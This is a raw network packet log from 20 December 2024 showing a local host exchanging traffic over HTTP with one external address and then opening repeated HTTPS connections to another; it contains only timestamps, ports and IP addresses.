Dec 20, 2024 07:18:02.934926987 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.935081005 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.935213089 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.937560081 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.937597990 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.937715054 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.989324093 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.989404917 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.989450932 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.990576029 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.990696907 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.990757942 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.993181944 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.993275881 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.993448973 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.995764971 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.995876074 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.995929003 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.998366117 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.998480082 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.998564005 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.000950098 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.001051903 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.001106024 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.003544092 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.003660917 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.003719091 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.006122112 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.006222963 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.006274939 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.008744001 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.009066105 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.009124994 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.011357069 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.011470079 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.011528969 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.013935089 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.014081955 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.014136076 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.016571045 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.016623974 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.016676903 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.019097090 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.019211054 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.019280910 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.021692991 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.021847010 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.021895885 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.024291039 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.024400949 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.024449110 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.026940107 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.026990891 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.027049065 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.029309034 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.029437065 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.029488087 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.031857967 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.031919956 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.031979084 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.034244061 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.034539938 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.034617901 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.036676884 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.036885023 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.036930084 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.039148092 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.039453030 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.039585114 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.041613102 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.041760921 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.041806936 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.043776989 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.043888092 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.043950081 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.045912981 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.046088934 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.046169996 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.047982931 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.048621893 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.048687935 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.049268961 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.049395084 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.049453974 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.050579071 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.050683975 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.050766945 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.051919937 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.052017927 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.052064896 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.053221941 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.053328037 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.053378105 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.054541111 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.054647923 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.054691076 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.055855989 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.055942059 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.056370974 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.057157993 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.057348013 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.057434082 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.058439016 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.058645010 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.058856964 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.059726000 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.059855938 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.060219049 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.061144114 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.061244965 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.061592102 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.062263966 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.062386990 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.062458992 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.063553095 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.063705921 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.063780069 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.064762115 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.064873934 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.064917088 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.066041946 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.066167116 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.066212893 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.067279100 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.067385912 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.067445993 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.068519115 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.068608046 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.068661928 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.069756985 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.069871902 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.069922924 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.070990086 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.071104050 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.071228027 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.072256088 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.072390079 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.072437048 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.073535919 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.073715925 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.073766947 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.074749947 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.074995041 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.075047016 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.076006889 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.076113939 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.076164007 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.077294111 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.077440023 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.077495098 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.078561068 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.078649998 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.078866959 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.079770088 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.079879999 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.079933882 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.081012964 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.122725964 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.181446075 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.181500912 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.181554079 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.181766033 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.181921005 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.181966066 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.183031082 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.183161020 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.183387995 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.184278011 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.184401989 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.184519053 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.185518026 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.185722113 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.185769081 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.186738968 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.186837912 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.186889887 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.187933922 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.188045025 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.188154936 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.189106941 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.189213037 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.189260006 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.190279961 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.190346003 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:03.190444946 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:03.856841087 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:04.631946087 CET	49736	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:04.632011890 CET	443	49736	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:04.632328987 CET	49736	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:04.635792971 CET	49736	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:04.635812044 CET	443	49736	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:05.859973907 CET	443	49736	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:05.860091925 CET	49736	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:05.863894939 CET	49736	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:05.863903999 CET	443	49736	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:05.864296913 CET	443	49736	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:05.904129028 CET	49736	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:05.932792902 CET	49736	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:05.932792902 CET	49736	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:05.932919025 CET	443	49736	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:06.583075047 CET	443	49736	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:06.583173990 CET	443	49736	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:06.583332062 CET	49736	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:06.584990978 CET	49736	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:06.585006952 CET	443	49736	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:06.585048914 CET	49736	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:06.585055113 CET	443	49736	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:06.598316908 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:06.598335981 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:06.598690033 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:06.599117041 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:06.599128962 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:07.813779116 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:07.813883066 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:07.815257072 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:07.815267086 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:07.815608978 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:07.816890001 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:07.816890001 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:07.816971064 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.586481094 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.586565971 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.586628914 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.586633921 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.586657047 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.586707115 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.586719990 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.594743967 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.594810009 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.594819069 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.603254080 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.603355885 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.603363037 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.653995991 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.654004097 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.700865984 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.722821951 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.763375044 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.763391018 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.810259104 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.810291052 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.850482941 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.850533009 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.850543022 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.850601912 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.850747108 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.850766897 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.850776911 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.850783110 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.850800991 CET	49738	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.850805998 CET	443	49738	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.934788942 CET	49739	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.934842110 CET	443	49739	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:08.934946060 CET	49739	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.935358047 CET	49739	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:08.935376883 CET	443	49739	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:10.149437904 CET	443	49739	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:10.149525881 CET	49739	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:10.151052952 CET	49739	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:10.151082039 CET	443	49739	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:10.151329041 CET	443	49739	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:10.152475119 CET	49739	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:10.152616978 CET	49739	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:10.152659893 CET	443	49739	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:10.152740955 CET	49739	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:10.152755022 CET	443	49739	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:11.390130997 CET	443	49739	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:11.390218973 CET	443	49739	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:11.390445948 CET	49739	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:11.390603065 CET	49739	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:11.390642881 CET	443	49739	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:11.413384914 CET	49740	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:11.413422108 CET	443	49740	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:11.413547039 CET	49740	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:11.413983107 CET	49740	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:11.413999081 CET	443	49740	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:12.631912947 CET	443	49740	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:12.632006884 CET	49740	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:12.633593082 CET	49740	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:12.633625031 CET	443	49740	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:12.633846045 CET	443	49740	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:12.635361910 CET	49740	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:12.635493994 CET	49740	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:12.635493994 CET	49740	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:12.635538101 CET	443	49740	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:13.476598978 CET	443	49740	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:13.476681948 CET	443	49740	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:13.476856947 CET	49740	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:13.477111101 CET	49740	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:13.477130890 CET	443	49740	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:13.550340891 CET	49741	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:13.550451040 CET	443	49741	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:13.550592899 CET	49741	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:13.550949097 CET	49741	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:13.550987959 CET	443	49741	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:14.764086962 CET	443	49741	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:14.764170885 CET	49741	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:14.765686035 CET	49741	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:14.765717030 CET	443	49741	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:14.765940905 CET	443	49741	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:14.767107010 CET	49741	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:14.767337084 CET	49741	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:14.767388105 CET	443	49741	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:14.767601967 CET	49741	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:14.767620087 CET	443	49741	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:15.737467051 CET	443	49741	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:15.737540007 CET	443	49741	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:15.737776041 CET	49741	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:15.738102913 CET	49741	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:15.738172054 CET	443	49741	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:15.825089931 CET	49743	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:15.825191975 CET	443	49743	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:15.825280905 CET	49743	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:15.825952053 CET	49743	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:15.826037884 CET	443	49743	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:17.038539886 CET	443	49743	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:17.038615942 CET	49743	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:17.046626091 CET	49743	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:17.046655893 CET	443	49743	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:17.046876907 CET	443	49743	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:17.048909903 CET	49743	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:17.049041033 CET	49743	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:17.049053907 CET	443	49743	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:17.801275015 CET	443	49743	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:17.801351070 CET	443	49743	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:17.801425934 CET	49743	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:17.801654100 CET	49743	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:17.801696062 CET	443	49743	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:18.213052988 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:18.213099957 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:18.213182926 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:18.213620901 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:18.213639975 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.432560921 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.432678938 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.434490919 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.434510946 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.435585976 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.437182903 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.438297987 CET	49745	443	192.168.2.4	172.67.197.170
